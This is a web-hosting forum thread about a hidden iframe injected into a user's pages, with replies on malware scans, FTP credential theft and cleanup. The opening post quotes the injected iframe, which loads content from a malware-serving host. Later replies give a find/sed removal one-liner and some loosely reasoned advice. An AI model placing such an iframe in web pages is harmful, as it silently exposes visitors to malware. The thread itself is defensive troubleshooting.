hidden iframe placed on pages

ok i was with a shared provider for a while and someone hacked my page and placed a hidden iframe

Code:
    <iframe height="125" width="125" style="visibility: hidden;" src="http://a5i.ru:8080/ts/in.cgi?pepsi102"/>
    now I built this page from the ground up on a new vps and to my suprise the iframe showed up again on my new page

first thought is someone is using a key logger but my home system is clean i just rebuilt it 2 days ago and i never type passwords i cut and past them

any ideas?

Sound's like the server or site has a security vulnerability? Do you use cpanel?

Form what it looks like form Site Advisor

http://www.siteadvisor.com/sites/a5i.ru:8080

- contain malware,
    - redirect to sites containing malware,
    - contain rogue antivirus,
    - redirect to fraud sites like Canadian Pharmacy.

You sure the system is clean? Run malwarebytes on that machine. I had a problem like this several weeks ago and several online and two locally installed AV programs (NOD32,Aviri) failed to detect the trojan. Malwarebytes successfully cleaned it.

iframe attacks

apparently its pretty common, I just found this

http://blog.unmaskparasites.com/2009...ill-prevalent/

Apart from your PC being infected, hackers also have system in place to sniff FTP details while you make connection to your server, later those details are used to infect your pages.

Steps you can use to prevent this from happening.

1) Use secure connection to FTP
    2) Use your control panel to upload files instead of FTP.
    3) Change FTP password after every use.

Hopefully you won't get those infected pages again.
    Vinsar.Net - Quality Web Hosting at Economical Price on USA & European Servers
    Offering domains, shared, reseller & VPS hosting.
    Reliable Domain Reseller Account Resell Domains with Confidence

Quote Originally Posted by NicAddress View Post
    You sure the system is clean? Run malwarebytes on that machine. I had a problem like this several weeks ago and several online and two locally installed AV programs (NOD32,Aviri) failed to detect the trojan. Malwarebytes successfully cleaned it.
    +1 for malwarebytes.

I've seen that same exact iframe(ending with pepsi) a lot lately, seems really common

Hi,

I think this is a virus, cos i have encounted this before. A friend of mine developed website in HTML, and her pc was infected with some kind of virus. This virus would add an iframe to all HTML docs created by her, but didn't touch any php codes on that site.

Also Avira was able to detect this very easily. I'd say rescan your system and see. use an offline scan, boot from a cd/another hdd and do a scan. that way you'll find the cause.

How to remove a5i.ru iframe

Hi ,

Please use the following script
    ===============
    find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5i.ru" {} \; -exec sed -i "/"a5i.ru"/d" {} \;
    ===============

The above command will remove the line which contains the word " a5i.ru " . The command will search all the files under /home

We are advising you to take necessary backups before running the above script.

The basic steps that is to be done to prevent this type of attack in future are

1) Scan your server periodically and check for rootkits and vulnerablilities.

2) Update all the 3rd party softwares to the latest version

3) Make sure your ftp paswords are updated

4) Ensure that appropriate file permissions are used for every file and directory on the web server
    SupportExpertz.com - the name says it all!
    Managed Cloud Servers
    Server Management and Monitoring
    24x7 outsourced customer support

Quote Originally Posted by logicsupport View Post
    ===============
    find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5i.ru" {} \; -exec sed -i "/"a5i.ru"/d" {} \;
    ===============
    Normally that iframe code starts in the same line as opening <body> tag, so its better to construct the line to replace the line with <body> as that tag will also get deleted.

Moreover its better to first examine few files on the server how and where the code is inserted as in some cases I have observed it to be in the </body> line.
    Vinsar.Net - Quality Web Hosting at Economical Price on USA & European Servers
    Offering domains, shared, reseller & VPS hosting.
    Reliable Domain Reseller Account Resell Domains with Confidence

Hi ,

===============
    ===============

The above command will remove the line which contains the word " a5i.ru " . The command will search all the files under /home

4) Ensure that appropriate file permissions are used for every file and directory on the web server

thanks it really good info for all
    HostNotch Hosting Services 99.9% uptime Shared Hosting, Reseller Hosting
    yajur | Sales Team
    CPanel Hosting R1 Soft Offsite-Backup Great Uptime
    http://hostnotch.com sales @ hostnotch.com

Don't change the FTP password in your client machine , they are getting the ftp passwords by encrypting ftp password files.
    miOOt Chat Solutions
    live chat Software for web hosting Customer Service
    Importance of Live Chat Software for Web Hosting Business

Hi ,

Thanks Yajur .

If you are having this problem server wide then the only possibility is your root password is used for this. Its better you change your root password . If its only on one account , just change the FTP password and that should work .
    SupportExpertz.com - the name says it all!
    Managed Cloud Servers
    Server Management and Monitoring
    24x7 outsourced customer support

its the nowadays common ftp exploit. Change all passwords for accounts that you have saved in your local ftp client.

Hi ,

===============
    ===============

Oh, many thanks to you.

Once you upload a fresh copy, then it will be more secure, if you change the ownerships of the file to root.root

simply,

chown root.root <index file>